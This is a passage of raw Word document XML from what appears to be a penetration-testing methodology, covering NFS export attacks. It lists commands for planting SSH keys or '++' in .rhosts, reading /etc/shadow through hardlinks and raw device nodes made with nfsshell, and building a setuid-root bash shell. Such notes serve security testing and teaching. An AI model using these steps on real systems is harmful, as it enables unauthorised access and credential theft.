          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00D317B0" w:rsidRDefault="00C53E5F" w:rsidP="00D317B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; host </w:t>
      </w:r>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;target&gt;</w:t>
      </w:r>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 xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.??.??.??</w:t>
      </w:r>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>??.??.??.??</w:t>
      </w:r>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) TCP</w:t>
      </w:r>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nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; export</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00D317B0" w:rsidRDefault="00C53E5F" w:rsidP="00D317B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Export list </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D317B0" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.??.??.??</w:t>
      </w:r>
      <w:r w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00D317B0" w:rsidRDefault="00BD2000" w:rsidP="00D317B0">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/home/dan</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F" w:rsidRPr="00D317B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                0.0.0.0/0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD2000" w:rsidRDefault="00BD2000" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00BD2000" w:rsidRDefault="00C53E5F" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Getting In</w:t>
      </w:r>
      <w:r w:rsidR="00367624" w:rsidRPr="00BD2000">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00BD2000" w:rsidRDefault="00BD2000" w:rsidP="00BD2000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exported</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> home dirs?</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F" w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a .ssh/authorized_key file (chmod 700 authorized_keys) </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read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a .rhosts file to login </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD2000"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add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ++ to the .rhosts file (or create one) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00BD2000" w:rsidRDefault="00BD2000" w:rsidP="00BD2000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exported</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> etc?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00B747C4" w:rsidRDefault="00C53E5F" w:rsidP="00367624">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> there a hosts.equiv file (or create one</w:t>
      </w:r>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73A47" w:rsidRDefault="00F73A47" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00BD2000" w:rsidRDefault="00C53E5F" w:rsidP="00C53E5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Priv Esc</w:t>
      </w:r>
      <w:r w:rsidR="00367624" w:rsidRPr="00BD2000">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRPr="00BD2000" w:rsidRDefault="00C53E5F" w:rsidP="00BD2000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hardlink</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to /etc/shadow to the read it</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ln</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow shadowRun mount on the box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nodev - you can create device nodes!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noexec - you can copy a binary there and execute it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nosuid - you can (if above applies) create a suid root shell and become root! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73A47" w:rsidRPr="00277483" w:rsidRDefault="00C53E5F" w:rsidP="00277483">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read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [x]inetd.conf and have write access to any of the files, maybe using suid process </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="00367624">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F5b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Root squas</w:t>
      </w:r>
      <w:r>
        <w:t>hing, nosuid and noexec options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00367624" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nodev</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -la on /dev/XXXX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hda</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sda</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mem</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lastRenderedPageBreak/>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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l /dev/hda1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brw-rw</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>---- 1 root disk 3, 1 Jan 30 09:01 /dev/hda1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create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> node over nfs using nfsshell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nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; mknod my-hda1-device b 3 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nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; chmod 444 my-hda1-device</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now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> search for shadow file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strings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> my-hda1-device | grep 'root:'or even replace your users id with 0! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00367624" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>noexec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00367624">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00B747C4" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an arse if you try to run a program on file system with this flag on then you will get a message similar to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00BD2000" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-sh</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD2000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/bash: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If nosuid is not set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00F73A47" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server: </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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> owned</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chmod</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a+rwx owned</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cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> owned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00367624"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cp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00B747C4" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> my machine </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cd owned</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get bash</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uid 0</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gid 0</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put bash</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chmod 5777</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367624" w:rsidRPr="00B747C4" w:rsidRDefault="00367624" w:rsidP="00367624">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B747C4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00367624"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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73A47">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F5c - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>File access t</w:t>
      </w:r>
      <w:r>
        <w:t>hrough UID and GID manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53E5F" w:rsidRDefault="009021DD" w:rsidP="009D6D8E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:r w:rsidR="00C53E5F">
        <w:t>sshell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E"/>
    <w:p w:rsidR="00367624" w:rsidRPr="00245334" w:rsidRDefault="00367624" w:rsidP="00245334">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rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –t nfs &lt;ip&gt;:&lt;share&gt; &lt;folder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00772F52" w:rsidRDefault="00367624" w:rsidP="00772F52">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rPr>
        <w:t>become</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;uid&gt;:&lt;gid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>F6 - R* services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F6a </w:t>
      </w:r>
      <w:r w:rsidR="00B84EB3">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B84EB3">
        <w:t xml:space="preserve">Berkeley </w:t>
      </w:r>
      <w:r>
